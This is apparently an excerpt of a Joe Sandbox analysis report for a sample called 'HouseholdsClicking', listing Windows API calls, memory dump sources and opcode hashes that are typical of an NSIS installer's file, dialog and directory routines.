                                                                                                                                            • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                            • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                            APIs
                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                            • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                            • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                            • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                            • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                            • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4115351271-0
                                                                                                                                            • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                            • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                            • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                            • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                            • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                            • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                            • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                            • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                            APIs
                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FilePointer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                            • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                            • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                            • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                            • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                            • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                            • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                            • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                            • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                            APIs
                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                            • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                            • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                            • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                            • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                            • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                            • String ID: $ @$M$N
                                                                                                                                            • API String ID: 1638840714-3479655940
                                                                                                                                            • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                            • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                            • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                            • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                            APIs
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                            • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                            • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                            • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                            • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                            • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                            Strings
                                                                                                                                            • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                            • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                            • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                            • \*.*, xrefs: 00406D2F
                                                                                                                                            • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                            • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                            • ptF, xrefs: 00406D1A
                                                                                                                                            • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                            • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                            • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                            • API String ID: 2035342205-1650287579
                                                                                                                                            • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                            • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                            • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                            • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                            • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                            • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                            • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                            • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                            • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                              • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                              • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,74DF23A0,00000000), ref: 00406902
                                                                                                                                            • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                            • String ID: F$A
                                                                                                                                            • API String ID: 3347642858-1281894373
                                                                                                                                            • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                            • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                            • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                            • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                            • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                            • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                            • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                            • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                            • API String ID: 1916479912-1189179171
                                                                                                                                            • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                            • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                            • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                            • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                            APIs
                                                                                                                                            • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,74DF23A0,00000000), ref: 00406902
                                                                                                                                            • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                            • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                            • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,74DF23A0,00000000), ref: 00406A73
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
